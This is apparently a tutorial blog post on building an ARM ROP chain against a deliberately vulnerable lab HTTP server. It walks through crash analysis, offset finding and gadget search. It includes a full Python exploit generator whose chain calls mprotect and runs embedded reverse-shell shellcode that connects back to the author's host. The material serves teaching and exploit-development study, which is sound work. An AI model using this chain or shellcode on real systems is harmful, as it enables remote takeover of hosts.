The goal of this part is to go through the whole process of developing a ROP chain against a known vulnerable target. In this case I build a simple vulnerable HTTP server (myhttpd) which runs locally on my armbox on port 8080. We found that the attacked daemon has a stack overflow in the URL parameter. For details on how to build the myhttpd or the lab setup see the first post of this series.
Investigating the memory map
As I already mentioned in the previous article, we need a part of the loaded binary (.text segment, dynamically loaded libary), where we search for gadgets. I used
libc
for my ROP chain. You can use any other or multiple other parts.
Start your debugger, attach to the vulnerable process and show the memory map:
[root@armbox ~]# r2 -d $(pidof myhttpd)
= attach 757 757
bin.baddr 0x00400000
Using 0x400000
asm.bits 32
-- Don't look at the code. Don't look.
[0xb6ef862c]> dmm
0x00400000 /usr/bin/myhttpd
0xb68c2000 /usr/lib/libgcc_s.so.1
0xb68ef000 /usr/lib/libdl-2.28.so
0xb6902000 /usr/lib/libffi.so.6.0.4
0xb691a000 /usr/lib/libgmp.so.10.3.2
0xb6988000 /usr/lib/libhogweed.so.4.4
0xb69c6000 /usr/lib/libnettle.so.6.4
0xb6a0d000 /usr/lib/libtasn1.so.6.5.5
0xb6a2d000 /usr/lib/libunistring.so.2.1.0
0xb6ba9000 /usr/lib/libp11-kit.so.0.3.0
0xb6cae000 /usr/lib/libz.so.1.2.11
0xb6cd3000 /usr/lib/libpthread-2.28.so
0xb6cfd000 /usr/lib/libgnutls.so.30.14.11
0xb6e5a000 /usr/lib/libc-2.28.so
0xb6fa5000 /usr/lib/libmicrohttpd.so.12.46.0
0xb6fce000 /usr/lib/ld-2.28.so
[0xb6ef862c]>
The larger the (r-x) segments of the used library / binary are, the better the chances to find good gagets. Choose wisely... :)
I have choosen:
0xb6e5a000 /usr/lib/libc-2.28.so
Investigating the crash
Let's crash the daemon! We will send a long URL to "myhttpd" and inspect the registers and the stack. Check out the following asciinema, make it fullscreen to avoid missing anything.
The daemon crashed and we see PC
got overwritten with 0x41414140
. What happend? As I explained in the second part of this series , the overflow overwrote the saved LR
of a non-leaf function. As soon as this function
executed its epilogue to restore the saved values, the saved LR
got popped into PC
to return to the caller. One note on the least significant bit: the BX
instruction basically copies the LSB of the address loaded into PC
to the T status bit of the CPSR
register, which switches the core between ARM and Thumb mode:
ARM (LSB=0)/ THUMB (LSB=1). The saved LR
(overwritten with 0x41414141
) got popped into PC, then the LSB of the popped address gets written into the CPSR
registers T-Bit (bit 5) and finally the LSB of PC
itself is set to 0, resulting in 0x41414140
.
As we can see R11
also contains our value 0x41414141
. That means the overflown function stores and restores LR
and R11
onto/from the stack. Some
compilers use R11
as reference to point to local variables within a function call (frame pointer):
The variables are then accessed as FP + offset
within that function.
Additionally, as we see in the Asciinema, the stack contains 'A'! Therefore we control the values of PC
, R11
and we have some space on the stack. Nice.
Lets take a deeper look into the stack. The following lines show the memory of the myhttpd process, after crash:
[0x41414140]> dm
0x00400000 # 0x00401000 - usr 4K s r-x /usr/bin/myhttpd /usr/bin/myhttpd ; loc.imp._ITM_registerTMCloneTable
0x00410000 # 0x00411000 - usr 4K s r-- /usr/bin/myhttpd /usr/bin/myhttpd
0x00411000 # 0x00412000 - usr 4K s rw- /usr/bin/myhttpd /usr/bin/myhttpd ; obj._GLOBAL_OFFSET_TABLE
0x00412000 # 0x00433000 - usr 132K s rw- [heap] [heap]
0xb5500000 # 0xb5521000 - usr 132K s rw- unk0 unk0
0xb5521000 # 0xb5600000 - usr 892K s --- unk1 unk1
0xb56ff000 # 0xb5700000 - usr 4K s --- unk2 unk2
0xb5700000 # 0xb5f00000 - usr 8M s rw- unk3 unk3
0xb5f00000 # 0xb5f21000 - usr 132K s rw- unk4 unk4
0xb5f21000 # 0xb6000000 - usr 892K s --- unk5 unk5
0xb60bf000 # 0xb60c0000 - usr 4K s --- unk6 unk6
0xb60c0000 # 0xb68c2000 - usr 8M s rw- unk7 unk7
[...]
loaded libraries
[...]
0xbefdf000 # 0xbf000000 - usr 132K s rw- [stack] [stack]
0xffff0000 # 0xffff1000 - usr 4K s r-x [vectors] [vectors]
One noticeable thing is that SP
(SP
= 0xb5efea50
) does not point to the section which is advertised as [stack] but
to a segment above (address-wise) the mapped libraries:
0xb5521000 # 0xb5600000 - usr 892K s --- unk1 unk1
It will be worth to understand what is happening here. Now, I am not sure why r2's dm (or gdb's vmmap) do not show the (rw-) permissions here - I assume we see the (rw-) mappings of the main process. The used microhttpd library opens a listeners thread, which then opens a worker thread for each new connection.
Check out the following strace to understand what is happening (pid 363 is the listener thread, 370 the worker thread):
[pid 363] mmap2(NULL, 8392704, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0xb56ff000
[pid 363] mprotect(0xb5700000, 8388608, PROT_READ|PROT_WRITE) = 0
[pid 363] clone(child_stack=0xb5efef98, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0xb5eff4c8, tls=0xb5eff920, child_tidptr=0xb5eff4c8) = 370
You can find the whole strace here.
We see that the listeners thread (glibc) is preparing a stack for the thread and assignes an appopriate child_stack to it. It took me some time to get what happend... to visualize the memory map, I made a picture... enjoy:
+------------------+-------------------------------------------------------------------------------------------+
| | |
| No R/W | ...AAAAAAA pthread_t, TLS of thread |
| permissions | mprotect(RW) <-------------------------> |
| | |
+------------------+--------------------------------------------------------------+----------------------------+
0xb56ff000 0xb5700000 ^ ^ 0xB5F00000
| |
guard memory thread stack growing downwards | +
<-----------------> <-----------------------------------------------------------+ 0xb5efef98
| SP of thread at creation
SP at crash
0xb5efea50
mmap2()
allocates a chunk of memory (8392704 bytes, starting at 0xb56ff000
) with no (---) permissions (see system call mmap2()
, parameter PROT_NONE
). Then
mprotect()
adds (rw-) permissions to a section of that memory region, but leaves out a little bit at the start (8388608 bytes starting at 0xb5700000
).
The threads stack (child_stack
paramter of clone()
) will point into the (rw-) region. Since stack grows downwards the memory region, with no (rw-)
permissions will act as a guard page. Since the stack already grew a little bit, the SP
value we observed after the crash
points to a address, which is a little bit smaller than the initial child_stack
value.
Well, let's summarize: We control the execution flow and also got some memory to store our ROP chain!
Finding the offsets
We already learned in the previous post that knowing about the the stack layout is crucial in building stack overflows.
If you have plenty or large local variables
stored on the stack, you have to shift your ROP payload many bytes towards higher memory regions, to reach the saved LR
.
Therefore the next step is to find the right offsets (shifter variable in my overflowgen.py script, I will introduce that soon) to shift the address
of our first gadget (and therefore the whole ROP chain and overflow data) exactly where the saved LR
resides. Over the years
plenty of tools got developed to ease that task, one is included in the metasploit framework
(/usr/share/metasploit-framework/tools/pattern_create.rb). But since we are using radare2, like the cool kids,
we can use ragg2
's included Bruijin pattern generator:
As you can see ragg2 does not avoid putting 1 into LSB (I do not know if metasploit does that, though). Therefore if ragg2 does not find the offset, try with +1, as I did in the video. Our offsets:
- PC: 144 Bytes
- SP: 148 Bytes
For reference the commandline to generate and query the Bruijin patterns:
BRUIJN=`ragg2 -r -P 250| tr -d '\n'`; echo -e "GET $BRUIJN HTTP/1.1\n" | nc 127.0.0.1 8080
Then you can use ragg2 to query for the found offsets: ragg2 -q 0x....
Exploiting the vulnerability
Depending on the length of your ROP chain you can execute basically all commands which you would otherwise execute in a shellcode. Nonetheless, space on stack
might be restricted and moreover it is much simpler to build, test and then execute a shellcode. Now we got two conflicting goals: We got memory space for
shellcode on the stack but the stack is only (rw-) - we can't execute it. Well, we already met the systemcall mprotect()
, when the worker thread stack was
created. Nothing stops us from using that system call again to make the stack (rwx) instead of (rw-) and then execute our shellcode from the stack. Many classic
ROP chains use exactly that technique...
Defining the goal: paramters for mprotect()
The prototype of mprotect()
:
int mprotect(void *addr, size_t len, int prot);
*addr
is the address where mprotect()
starts to apply the permissions. The result will be: The next len
bytes will have, after the call, set the
permissions delivered via the prot
parameter. The parameter prot
has to be a xor of the following values:
32 #define PROT_READ 0x1 /* Page can be read. */
33 #define PROT_WRITE 0x2 /* Page can be written. */
34 #define PROT_EXEC 0x4 /* Page can be executed. */
35 #define PROT_NONE 0x0 /* Page can not be accessed. */
mman-linux.h
Our target register values then are:
R0
: address of thread stack.*addr
must be aligned to the systems page size (most commonly 4096 bytes). You want thatR0
is smaller than the address, where your shellcode will be loaded.R1
: Some value to make sure our stack will be made executeable.R2
: 0x7
The chaining instruction of our last ROP gadget will point to the address of mprotect()
in libc. mprotect()
will then return and next our shellcode will be
executed. I guess now is a good point to talk about chaining instructions...
Chaining instructions - handling BX LR
When I explained the general ROP idea in the second part of this series, I ready dropped two gadgets with different chaining instructions: POP {..., PC}
and BLX R4
. Then we talked about leaf and non-leaf functions, compared
their epilogues and found that BX LR
is used in leaf functions to return back to the caller.
Certainly these instruction is also used as the chaining instructions of a gadget. Since we can't be too picky with gadgets, we have to use
what we get as gadgets.
I think at this point it should be pretty how we chain gadgets (if not see the previous post) like POP {..., PC}
. But how do we handle BX LR
?
One way would be to prepare the LR
register each time with the next gadgets address before using a gadget, which uses BX LR
as chaining instruction.
That would be certainly possible, but pretty costly in matters of space and not very effective. A more elegant way is to point LR
to a gadget which does
something like POP {PC}
, so that we can use BX LR
gadgets just by pushing the address of the next gadget on the stack. A simple example:
Execution flow:
LR: 0xaaaaaaaa
+-------+ 0xaaaaaaaa : pop {pc} <-----+ 2)
| +
3) | 0xbbbbbbbb : mov r0, #1337, bx lr <---------+ 1)
|
+------> 0xcccccccc : mov r2, r1, pop {r11, pc}
Stack layout while execution:
SP
+ 0xa... 0xc...
| +---> +---------->
v
+---------------------+-------+------------------------------+
| | 0x | JUNK | value| |
| | cc | value | for | |
| | cc | for | PC | |
| | cc | R11 | | |
| | cc | | | |
+-------------+-------+-------+------+-----------------------+
0x0 0xF
We want to first execute the gadget at 0xbbbbbbb
, then the gadget at 0xcccccccc
. LR
points to the gadget at 0xaaaaaaa
. When a gadget uses BX LR
as
chaining instruction, BX LR
will jump to 0xaaaaaaaa
, POP
the value at SP
into PC
and therefore continue the execution there. In our example we prepared the
ROP chain in a way that 0xaaaaaaaa
POP
s the address 0xcccccccc
into PC. Each time we use a BX LR
gadget now, we can push the following gadgets address
on the stack and therefore chain them in a more convinient way.
Sometimes there are chaining instructions which use BL
in any combination, like BLX R7
. When we can't avoid using such a gadget, we have to restore
our value in LR
to point again to 0xaaaaaaa
, since the BL
instruction will update LR
with PC+4
.
For all other chaining instructions I assume the instructions show what has to be done and how the ROP chain has to be prepared to chain gadgets successfully.
Using ropper
How do we find gadgets? You can manually dissect and disassemble them using objdump... but thats a pain. Let me introduce ropper:
ropper can be easily installed in a python virtualenv. Check the GitHub for instructions.
I'll let the following asciinema explain the most important features:
The parameter /1/ specifies the quality of the found gadgets, which basically stands for the number of instructions per gadget. /1/ will find gadgets, where the first instruction matches the seach parameter and the second is the chaining opcde. /2/ will consequently find additionally gadgets, which have a second instruction before the chaining one. You can use these instructions too, as long as they do not interfere with your ROP chain...
Ropper shows the offsets of the found instructions inside the searched binary. In the first section of this post we already had a look where in memory the libraries reside. To use the gadgets from within libc we will add the offset roppers shows us to the base address, we already found out.
As you already know ARM instructions are 32 bit long, Thumb instructions only 16 bit. We can use this fact and interprete 32 bit ARM instructions as 16 bit Thumb instructions by just splitting them in half. Ropper does that automatically, if we set arch ARMTHUMB. Beware: As you can see in the asciinima above, if we set ARMTHUMB as architecture, ropper will show us two columns of offsets (red and green). The green one is the one you want to choose as offset. You will note that the LSB of the green addresses is 1, so the core will automatically jump to Thumb mode when the gadget is executed.
ROP ROP ROP
Next step is build the ROP chain, which
- sets up
R0
,R1
andR2
in a way that the stack region of our threat is going to be remapped (rwx) aftermprotect()
was called - call mprotect()
- jump to our shellcode on stack
Currently I do not think that it would be very helpful to explain the hole ROP chain. If you want an explanation, contact me and I will add one. Until then, I hope the embedded comments and the following bullet points are sufficient.
-
My ROP chain comments notation:
(7)
: new (7th) gadget(7 p1)
: parameter 1 to gadget(7)
- ergo: "
(15 p1): (16) mov r0, #56
" means that parameter 1 of gadget15
is the address of gadget(16)
.
-
Preparing the
mprotect()
call- How to prepare
R0
: load SP + 4 intoR0
(11), align value to 4096 (page size on my system) (14) by calculatingR0
&&R1
(0xFFFFF001
- LSB ofSP
will always be 0).R1
got initiialized by gadget (9 p2). - How to prepare
R1
: load with0x01010101
(15 p1) - How to prepare
R2
: Load0xFFFFFFFF-0x29
intoR6
(3 p4),ADD 0x31
(= 0x7) (4). Then moveR6
toR2
(6) - mprotect() is then called in (15 p2)
- How to prepare
-
when mprotect() returns, it will execute our prepared
BX LR
slide, which will executePOP {PC}
and load the address of the last gadget from the stack. The last gadget (16) is then executed:BLX SP
. SinceSP
now points to our shellcode, which is appended directly to our ROP chain, we that will execute the shellcode. -
The shellcode I used is from Azerias great tutorial on ARM shellcode - in this case it is the TCP reverse shellcode, which connects back to port 4444. I changed the connectback IP to 192.168.250.1. That means the exploited myhttpd process will connect back to a netcat listener on my host system.
The other gadgets, which are part of my ROP chain (see below in the script) are used to set up the BX LR
slide, restore it, prepare values, and so on...
The ROP chain is embedded in my overflowgen.py script (see below), which should make ROP chain developement easier. Take your time to understand
the script and its features, like --human
print and --httpencode
. You can read about I use --human
in the next section.
The first few variables (shift, shellcode, fmt, base) depend on your environment. During this post we found the values for base, shift (offset). Check them and make sure you understand what they do and how we found them during this tutorial.
You can find the ROP chain I used to exploit myhttpd as overflow
variable in the following script.
#!env python
import struct
import sys
import argparse
from urllib.parse import quote_from_bytes
parser = argparse.ArgumentParser()
parser.add_argument('--human', help='print overflow string human readable', action='store_true', default=False)
parser.add_argument('--httpencode', help='HTTP encode overflow data (not pre_out() and post_out() data', action='store_true', default=False)
args = parser.parse_args()
# <I little endian unsigned integer
# adjust to your CPU arch
global fmt
fmt='<I'
# base address in the process memory of the library you want to use for your ROP chain
base=0xb6e5a000
# how many bytes should we shift? memory: [shift*"A"+data()+lib(),...]
shift=144
shifter = [bytes(shift*'A','ascii'),'shifter']
shellcode = b'\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0a\xa1\x4a\x70\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x21\x01\xdf\x20\x1c\x02\x21\x01\xdf\x04\xa0\x52\x40\x49\x40\xc2\x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\xc0\xa8\xfa\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58'
def pre_out():
print("GET ", end='')
def post_out():
print(" HTTP/1.1\r\n\r\n\r\n", end='')
def data(data, cmt=''):
return [struct.pack(fmt,data),cmt]
def lib(offset, cmt=''):
return [struct.pack(fmt,base+offset),cmt]
def out(data):
data = [d[0] for d in data]
b = bytearray(b''.join(data))
pre_out()
sys.stdout.flush()
if shellcode != '':
for x in shellcode:
b.append(x)
if args.httpencode:
b = quote_from_bytes(b)
print(b, end='')
if not args.httpencode:
sys.stdout.buffer.write(b)
sys.stdout.flush()
post_out()
sys.stdout.flush()
def out_human(data):
pre_out()
sys.stdout.flush()
b = '['
for d in data:
b+='0x'+d[0].hex()+' = '+d[1]+'|'
if shellcode != '':
b += shellcode.hex()
b += ']'
print(b,end='')
sys.stdout.flush()
post_out()
sys.stdout.flush()
if args.human:
fmt = '>I'
overflow = [
shifter,
# prepare BX LR slider, chaining with r3
lib(0x00103251), # (1): 0x00103250 (0x00103251): pop {r3, r7, pc};
lib(0x0000220f,'r3'), # (1 p1): prepare r3 for gadget (3) 0x0000220e (0x0000220f): pop {r0, r3, r4, r6, r7, pc};
data(0x56565656,'r7'), # (1 p2): JUNK
lib(0x0005c038,'pc'), # = (1 p3: ) (2): 0x0005c038: pop {lr}; bx r3;
lib(0x000db435,'lr'), # = (2 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};
# / prepare BX LR slider
lib(0x00024cb4,'r0'), # (3 p1) (5:) and r0, r0, #1; bx lr;
lib(0x00103251, 'r3'), # (3 p2) (7:) restore lr,
data(0x54545454,'r4'), # (3 p3) # JUNK
data(0xFFFFFFFF-0x29,'r6'), # (3 p4): value for (4) gadget
data(0x57575757,'r7'), # (3 p5)
lib(0x00012f6f,'PC'), # (3 p6) (4:) adds r6, #0x31; bx r0;
lib(0x0003ea84), # (5 p1 bx lr) (6:) mov r2, r6; blx r3;
lib(0x00116b80), # (7: p1) (9:) 0x00116b80: pop {r1, pc};
data(0x57575757), # (7 p2)
lib(0x0005c038,'pc'), # = (7 p3: ) (8:) 0x0005c038: pop {lr}; bx r3; (2)
lib(0x000db435,'lr'), # = (8 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};
data(0xFFFFF001, 'r1'), #( 9 p1)
lib(0x00103251), # (9 p2) (10:) 0x00103250 (0x00103251): pop {r3, r7, pc};
lib(0x00103251,'r3'), # (10 p1) (11:) 0x00103250 (0x00103251): pop {r3, r7, pc};
data(0x56565656,'r7'), # (10 p2)
lib(0x00107cb4, 'PC'), # (10 p3) add r0, sp, #4; blx r3;
lib(0x00024e54, 'R3'), # (11 p1), (13:) #0x00024e54: and r0, r0, r1; bx lr;
data(0x57575757,'r7'), # (11 p2)
lib(0x0005c038,'pc'), # (11 p3: ) (12): 0x0005c038: pop {lr}; bx r3;
lib(0x000db435,'lr'), # (12 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};
lib(0x00116b80), # (13 p1) (14:) 0x00116b80: pop {r1, pc};
data(0x10101010, 'r1'), # (14 P1)
lib(0x000d22d0,'PC'), # (14 p2) mprotect
lib(0x00034d1d,'PC') # blx sp
]
if args.human:
out_human(overflow)
else:
out(overflow)
Download the script here.
ROP chain developement process
My process is currently as follows:
- I only add one gadget at a time.
- Before sending the payload to the vulnerable process I attach my debugger.
- I set up the new gadget in a way that
PC
is going to be something known, the same for chaged registers. - After I executed the payload I inspect the registers to check if the gadget was successfully executed.
To ease that task I added a --human
option to my script, which basically prints our the following output:
[root@armbox ~]# python overflowgen-myhttpd.py --human
GET
[0x41[...]1414141414141414141414141 = shifter|0xb6f5d251 = |0xb6e5c20f = r3|0x56565656 = r7|
0xb6eb6038 = pc|0xb6f35435 = lr|0xb6e7ecb4 = r0|0xb6f5d251 = r3|0x54545454 = r4|0xffffffd6 = r6|
0x57575757 = r7|0xb6e6cf6f = PC|0xb6e98a84 = |0xb6f70b80 = |0x57575757 = |0xb6eb6038 = pc|
0xb6f35435 = lr|0xfffff001 = r1|0xb6f5d251 = |0xb6f5d251 = r3|0x56565656 = r7|0xb6f61cb4 = PC|
0xb6e7ee54 = R3|0x57575757 = r7|0xb6eb6038 = pc|0xb6f35435 = lr|0xb6f70b80 =
|0x10101010 = r1|0xb6f2c2d0 = PC|0xb6e8ed1d = PC|01308fe213ff2fe102200121921ac827513701df041c0aa14a701022023701df3f27201c491a01df201c012101df201c022101df04a052404940c2710b2701df02ff115cc0a8fa012f62696e2f736858] HTTP/1.1
After adding a gadget you can human-print your payload and check if the registers match with the planned values.
General Obversations
Be well aware: Not all registers are equal – at least on the used libc. Move something into R0 is easy...
(ropper) dimi@dimi-lab ~/arm-rop % count=0; while [[ $count -le 12 ]]; do echo -n R$count": "; ropper --file libc-2.28.so --quality 1 --search "mov r$count,%" 2>/dev/null| grep ':' | wc -l; let count=count+1; done
search mov R0, any
R0: 88
R1: 14
R2: 7
R3: 8
R4: 1
R5: 1
R6: 2
R7: 1
R8: 0
R9: 0
R10: 0
R11: 0
R12: 0
... moving something out, maybe not so:
(ropper) dimi@dimi-lab ~/arm-rop % count=0; while [[ $count -le 12 ]]; do echo -n R$count": "; ropper --file libc-2.28.so --quality 1 --search "mov %, r$count" 2>/dev/null| grep ':' | wc -l; let count=count+1; done
search mov any, R0
R0: 0
R1: 3
R2: 6
R3: 8
R4: 13
R5: 32
R6: 25
R7: 10
R8: 8
R9: 7
R10: 5
R11: 3
R12: 4
Thats only one example and only ARM (not ARMTHUMB), nonetheless interesting.
Another important point is: the less registers you pullute with your values, the better. As you saw earlier you might need registers which are "stack bound" – especially in processes which create threads, these might be rare.
Action
<< previous post of this series | soon...?